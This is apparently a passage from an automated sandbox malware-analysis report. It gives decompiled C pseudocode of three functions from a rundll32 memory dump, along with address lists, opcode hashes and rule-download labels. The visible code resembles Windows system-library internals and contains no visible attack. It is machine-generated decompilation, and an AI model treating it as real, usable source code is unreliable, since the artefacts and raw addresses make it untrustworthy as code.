                                                                                                                0x04460f39
                                                                                                                0x04460f3a
                                                                                                                0x04460f3c
                                                                                                                0x04460f3c
                                                                                                                0x04460f3f
                                                                                                                0x04460f50
                                                                                                                0x04460f55
                                                                                                                0x04460f55
                                                                                                                0x04460f59
                                                                                                                0x044052eb
                                                                                                                0x044052f1
                                                                                                                0x044052f1
                                                                                                                0x04460e7d
                                                                                                                0x04460e84
                                                                                                                0x04460e88
                                                                                                                0x04460e8a
                                                                                                                0x04460e8a
                                                                                                                0x04460e8d
                                                                                                                0x04460e9e
                                                                                                                0x04460ea3
                                                                                                                0x04460ea3
                                                                                                                0x04460ea7
                                                                                                                0x04460eaf
                                                                                                                0x04460eb3
                                                                                                                0x04460eb9
                                                                                                                0x04460eb9
                                                                                                                0x04460ebc
                                                                                                                0x04460ecd
                                                                                                                0x04460ecd
                                                                                                                0x00000000
                                                                                                                0x04460eb3
                                                                                                                0x04460e1e
                                                                                                                0x04460e21
                                                                                                                0x04460e25
                                                                                                                0x04460e2b
                                                                                                                0x04460e2f
                                                                                                                0x04460e30
                                                                                                                0x04460e3a
                                                                                                                0x04460e3f
                                                                                                                0x04460e41
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04460e47
                                                                                                                0x00000000
                                                                                                                0x04460e47
                                                                                                                0x04460df9
                                                                                                                0x04460dfe
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04460dfe
                                                                                                                0x04405303
                                                                                                                0x04405307
                                                                                                                0x00000000
                                                                                                                0x04405309
                                                                                                                0x00000000
                                                                                                                0x04405309
                                                                                                                0x04405307
                                                                                                                0x044052e9
                                                                                                                0x044052e9
                                                                                                                0x00000000
                                                                                                                0x044052e9
                                                                                                                0x0440530e
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7f27577a7392b0f81c28792dedc5f6c1c965e36a15e832c92c3ab283dcfa2837
                                                                                                                • Instruction ID: 27fe9668445b4173c569e61afb9e032b4994ad3377660a8f964a002b6af9bd84
                                                                                                                • Opcode Fuzzy Hash: 7f27577a7392b0f81c28792dedc5f6c1c965e36a15e832c92c3ab283dcfa2837
                                                                                                                • Instruction Fuzzy Hash: 1151EF71204742ABEB20DF69C840B27BBE4FF84714F24492FE59687691E774F854CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04432AE4 Relevance: .2, Instructions: 159COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E04432AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x44f8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x44f8208; // 0x44f8207
				_t8 = _t57 + 0x44f8208; // 0x44f8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x44f8450; // 0x35173a
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x44f821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x44f6d5c; // 0x7f870654
							_t72 =  *0x44f6d5c; // 0x7f870654
							_t75 =  *0x44f6d5c; // 0x7f870654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x44f6d5c; // 0x7f870654
							_t84 =  *0x44f6d5c; // 0x7f870654
							_t87 =  *0x44f6d5c; // 0x7f870654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0444F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                                                                                0x04432ae4
                                                                                                                0x04432aec
                                                                                                                0x04432aef
                                                                                                                0x04432af4
                                                                                                                0x04432af7
                                                                                                                0x04432afd
                                                                                                                0x04432b92
                                                                                                                0x04432b92
                                                                                                                0x04432b97
                                                                                                                0x04432b9c
                                                                                                                0x04432b9c
                                                                                                                0x04432b03
                                                                                                                0x04432b06
                                                                                                                0x04432b09
                                                                                                                0x04432b09
                                                                                                                0x04432b0f
                                                                                                                0x04432b15
                                                                                                                0x04432b15
                                                                                                                0x04432b1b
                                                                                                                0x04432b1e
                                                                                                                0x04432b21
                                                                                                                0x04432b26
                                                                                                                0x04432b29
                                                                                                                0x04432b81
                                                                                                                0x04432b84
                                                                                                                0x04432c0e
                                                                                                                0x04432c15
                                                                                                                0x04432c24
                                                                                                                0x04432c24
                                                                                                                0x04432b8a
                                                                                                                0x04432b8a
                                                                                                                0x04432b8a
                                                                                                                0x04432b8a
                                                                                                                0x04432b90
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04432b4a
                                                                                                                0x04432b4a
                                                                                                                0x04432b4d
                                                                                                                0x04432b53
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04432b55
                                                                                                                0x04432b58
                                                                                                                0x04432bb7
                                                                                                                0x04475d1b
                                                                                                                0x04475d37
                                                                                                                0x04475d47
                                                                                                                0x04475d53
                                                                                                                0x04432bbd
                                                                                                                0x04432bbd
                                                                                                                0x04432bbd
                                                                                                                0x04432bb7
                                                                                                                0x04432b5d
                                                                                                                0x04432c2f
                                                                                                                0x04475d5b
                                                                                                                0x04475d77
                                                                                                                0x04475d87
                                                                                                                0x04475d93
                                                                                                                0x04432c35
                                                                                                                0x04432c35
                                                                                                                0x04432c35
                                                                                                                0x04432c2f
                                                                                                                0x04432b65
                                                                                                                0x04432b9f
                                                                                                                0x04432ba2
                                                                                                                0x04432b67
                                                                                                                0x04432b67
                                                                                                                0x04432b69
                                                                                                                0x04432b6b
                                                                                                                0x04432b6e
                                                                                                                0x04432bc9
                                                                                                                0x04432bcc
                                                                                                                0x04432bcf
                                                                                                                0x04432bd4
                                                                                                                0x04432bd6
                                                                                                                0x04432bd6
                                                                                                                0x04432bdb
                                                                                                                0x04432c02
                                                                                                                0x04432c05
                                                                                                                0x04432c07
                                                                                                                0x00000000
                                                                                                                0x04432c07
                                                                                                                0x04432be0
                                                                                                                0x04432c00
                                                                                                                0x04432c3f
                                                                                                                0x04432c3f
                                                                                                                0x00000000
                                                                                                                0x04432c00
                                                                                                                0x04432be5
                                                                                                                0x04432be7
                                                                                                                0x04432bec
                                                                                                                0x04432bf4
                                                                                                                0x04432bf6
                                                                                                                0x00000000
                                                                                                                0x04432bf6
                                                                                                                0x04432b70
                                                                                                                0x04432b76
                                                                                                                0x04432b2b
                                                                                                                0x04432b2b
                                                                                                                0x04432b2d
                                                                                                                0x04432b2f
                                                                                                                0x04432b32
                                                                                                                0x04432b35
                                                                                                                0x04432b3a
                                                                                                                0x00000000
                                                                                                                0x04432b40
                                                                                                                0x04432b43
                                                                                                                0x04432b45
                                                                                                                0x04432b47
                                                                                                                0x04432b4a
                                                                                                                0x04432b4d
                                                                                                                0x04432b53
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04432b53
                                                                                                                0x04432b78
                                                                                                                0x04432b78
                                                                                                                0x04432b7b
                                                                                                                0x04432b7e
                                                                                                                0x00000000
                                                                                                                0x04432b7e
                                                                                                                0x04432b76
                                                                                                                0x04432ba5
                                                                                                                0x04432ba5
                                                                                                                0x04432ba8
                                                                                                                0x04432bad
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04432baf
                                                                                                                0x04432baf
                                                                                                                0x04432bc2
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8b9fcdccccb112c41a86a64e042a65043dfaccd8b4fbf0072fdcfd7ac7cbab4e
                                                                                                                • Instruction ID: d5807b1fbaf219d79514d704e194d88e1550febd27e04e9ad4ea32417570b656
                                                                                                                • Opcode Fuzzy Hash: 8b9fcdccccb112c41a86a64e042a65043dfaccd8b4fbf0072fdcfd7ac7cbab4e
                                                                                                                • Instruction Fuzzy Hash: 13519F76B001258BCF24DF1CC8949BEB7B1FB88B01716849BE8569B310E774BE52DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044CAE44 Relevance: .2, Instructions: 152COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 86%
                                                                                                                			E044CAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E044CC38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E044CACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E044CFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E044CEA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E04427D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E044C1608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E044D1536(0x44f8ae4, (_t74 -  *0x44f8b04 >> 0x14) + (_t74 -  *0x44f8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L044CC323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E044CA80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E044ACB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E044CACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                                                                                                0x044cae44
                                                                                                                0x044cae4c
                                                                                                                0x044cae53
                                                                                                                0x044cae55
                                                                                                                0x044cae5c
                                                                                                                0x044cae64
                                                                                                                0x044cae68
                                                                                                                0x044cae75
                                                                                                                0x044cae75
                                                                                                                0x044cae78
                                                                                                                0x044cae7a
                                                                                                                0x044cae7c
                                                                                                                0x044cae7f
                                                                                                                0x044caea8
                                                                                                                0x044caeab
                                                                                                                0x044caead
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044caeb3
                                                                                                                0x044caeb8
                                                                                                                0x044caebb
                                                                                                                0x044caebd
                                                                                                                0x00000000
                                                                                                                0x044cae81
                                                                                                                0x044cae88
                                                                                                                0x044cae8f
                                                                                                                0x044cae9b
                                                                                                                0x044cae96
                                                                                                                0x044cae96
                                                                                                                0x044cae96
                                                                                                                0x044caea0
                                                                                                                0x044caea3
                                                                                                                0x044caebf
                                                                                                                0x044caebf
                                                                                                                0x044caec3
                                                                                                                0x044caec9
                                                                                                                0x044caf0d
                                                                                                                0x044caf14
                                                                                                                0x044caf3d
                                                                                                                0x044caf3d
                                                                                                                0x044caf41
                                                                                                                0x044caf44
                                                                                                                0x044caf67
                                                                                                                0x044caf67
                                                                                                                0x044caf6a
                                                                                                                0x044cafca
                                                                                                                0x044cafd1
                                                                                                                0x00000000
                                                                                                                0x044cafd1
                                                                                                                0x044caf6c
                                                                                                                0x044caf6d
                                                                                                                0x044caf75
                                                                                                                0x044caf7c
                                                                                                                0x044caf7e
                                                                                                                0x044caf80
                                                                                                                0x044caf85
                                                                                                                0x044caf87
                                                                                                                0x044caf99
                                                                                                                0x044caf89
                                                                                                                0x044caf92
                                                                                                                0x044caf92
                                                                                                                0x044caf9e
                                                                                                                0x044cafa1
                                                                                                                0x044cafa3
                                                                                                                0x044cafa9
                                                                                                                0x044cafb0
                                                                                                                0x044cafb2
                                                                                                                0x044cafb4
                                                                                                                0x044cafbc
                                                                                                                0x044cafbc
                                                                                                                0x044cafb4
                                                                                                                0x044cafb0
                                                                                                                0x00000000
                                                                                                                0x044cafa1
                                                                                                                0x044caf4f
                                                                                                                0x044caf57
                                                                                                                0x044caf5c
                                                                                                                0x044caf5e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044caf60
                                                                                                                0x044caf64
                                                                                                                0x044caf64
                                                                                                                0x00000000
                                                                                                                0x044caf64
                                                                                                                0x044caf1a
                                                                                                                0x044caf25
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044caf27
                                                                                                                0x044caf28
                                                                                                                0x044caf33
                                                                                                                0x00000000
                                                                                                                0x044caed0
                                                                                                                0x044caed0
                                                                                                                0x044caed2
                                                                                                                0x044caee1
                                                                                                                0x044caee4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044caee6
                                                                                                                0x044caeec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044caefb
                                                                                                                0x044caf07
                                                                                                                0x044cafd3
                                                                                                                0x044cafdb
                                                                                                                0x044cafdb
                                                                                                                0x00000000
                                                                                                                0x044caf07
                                                                                                                0x044caed6
                                                                                                                0x044caed8
                                                                                                                0x044caedf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044caedf
                                                                                                                0x044caec9

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 22d3df6384efd394b6ec56b99e15719ed4567edb2ff343d9b74c1bc9019f01f7
                                                                                                                • Instruction ID: 5c9a79cd344d8ce00696168bb53ddb1bfe3f423174885c47f4e17a92dfc6208d
                                                                                                                • Opcode Fuzzy Hash: 22d3df6384efd394b6ec56b99e15719ed4567edb2ff343d9b74c1bc9019f01f7
                                                                                                                • Instruction Fuzzy Hash: 1841D2797002199BEF65DB26C894B7BB399AF84714F0C421FF816A7391DB74F801C6A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0442DBE9 Relevance: .1, Instructions: 149COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 86%
                                                                                                                			E0442DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0440CC50(E04404510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E04427D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E044D8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E04422280(_t58, _v44);
						E0442DD82(_v44, _t102, _t98);
						E0442B944(_t102, _v5);
						return E0441FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x44f8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x44f862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x44f8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x44f862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x44cfb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                                                                                0x0442dbe9
                                                                                                                0x0442dbf2
                                                                                                                0x0442dbf7
                                                                                                                0x0442dbf9
                                                                                                                0x0442dbfc
                                                                                                                0x0442dc00
                                                                                                                0x0442dc03
                                                                                                                0x0442dc14
                                                                                                                0x0442dd54
                                                                                                                0x0442dd54
                                                                                                                0x0442dd54
                                                                                                                0x0442dc18
                                                                                                                0x0442dc1d
                                                                                                                0x0442dc1d
                                                                                                                0x0442dc32
                                                                                                                0x0442dc3b
                                                                                                                0x0442dc3e
                                                                                                                0x0442dc46
                                                                                                                0x0442dd5b
                                                                                                                0x0442dd62
                                                                                                                0x0442dd64
                                                                                                                0x0442dd67
                                                                                                                0x0442dd69
                                                                                                                0x0442dd6b
                                                                                                                0x0442dd6e
                                                                                                                0x0442dd70
                                                                                                                0x0442dd73
                                                                                                                0x0442dd73
                                                                                                                0x00000000
                                                                                                                0x0442dc4c
                                                                                                                0x0442dc4e
                                                                                                                0x04473ae3
                                                                                                                0x04473ae8
                                                                                                                0x04473aea
                                                                                                                0x0442dce7
                                                                                                                0x0442dce9
                                                                                                                0x0442dcec
                                                                                                                0x0442dcee
                                                                                                                0x0442dcf0
                                                                                                                0x0442dcf3
                                                                                                                0x0442dcf5
                                                                                                                0x04473af2
                                                                                                                0x04473af5
                                                                                                                0x04473af5
                                                                                                                0x0442dd06
                                                                                                                0x0442dd08
                                                                                                                0x0442dd0b
                                                                                                                0x0442dd12
                                                                                                                0x04473b08
                                                                                                                0x0442dd18
                                                                                                                0x0442dd18
                                                                                                                0x0442dd18
                                                                                                                0x0442dd20
                                                                                                                0x0442dd23
                                                                                                                0x04473b16
                                                                                                                0x04473b16
                                                                                                                0x0442dd29
                                                                                                                0x0442dd2d
                                                                                                                0x0442dd36
                                                                                                                0x0442dd40
                                                                                                                0x0442dd51
                                                                                                                0x0442dd51
                                                                                                                0x0442dc54
                                                                                                                0x0442dc59
                                                                                                                0x0442dc59
                                                                                                                0x0442dc5e
                                                                                                                0x0442dc5e
                                                                                                                0x0442dc63
                                                                                                                0x0442dc66
                                                                                                                0x0442dc6b
                                                                                                                0x0442dc78
                                                                                                                0x0442dc7b
                                                                                                                0x0442dc81
                                                                                                                0x0442dc81
                                                                                                                0x0442dc83
                                                                                                                0x0442dc89
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0442dd7b
                                                                                                                0x0442dd7b
                                                                                                                0x0442dc8f
                                                                                                                0x0442dc8f
                                                                                                                0x0442dc92
                                                                                                                0x0442dc99
                                                                                                                0x0442dc9f
                                                                                                                0x0442dca5
                                                                                                                0x0442dcaa
                                                                                                                0x0442dcaa
                                                                                                                0x0442dcb3
                                                                                                                0x0442dcb8
                                                                                                                0x0442dcbb
                                                                                                                0x0442dcc1
                                                                                                                0x0442dccf
                                                                                                                0x0442dcd2
                                                                                                                0x0442dcd5
                                                                                                                0x0442dcd7
                                                                                                                0x0442dcda
                                                                                                                0x0442dcdc
                                                                                                                0x0442dcdc
                                                                                                                0x0442dce2
                                                                                                                0x0442dce4
                                                                                                                0x00000000
                                                                                                                0x0442dce4

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 43a93e919e7d60021772518e435b9c2af78bc01ad7deab3c8b5c1dcb66b4a723
                                                                                                                • Instruction ID: 35eddd132b2dd7c81c6440c1708e9617c5331a00536877dc9b6a8c9b260c8cf8
                                                                                                                • Opcode Fuzzy Hash: 43a93e919e7d60021772518e435b9c2af78bc01ad7deab3c8b5c1dcb66b4a723
                                                                                                                • Instruction Fuzzy Hash: 925199B1E00625CBDF14DF69C680AAEBBF1FB48350F20856AD955AB340EB70B945CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

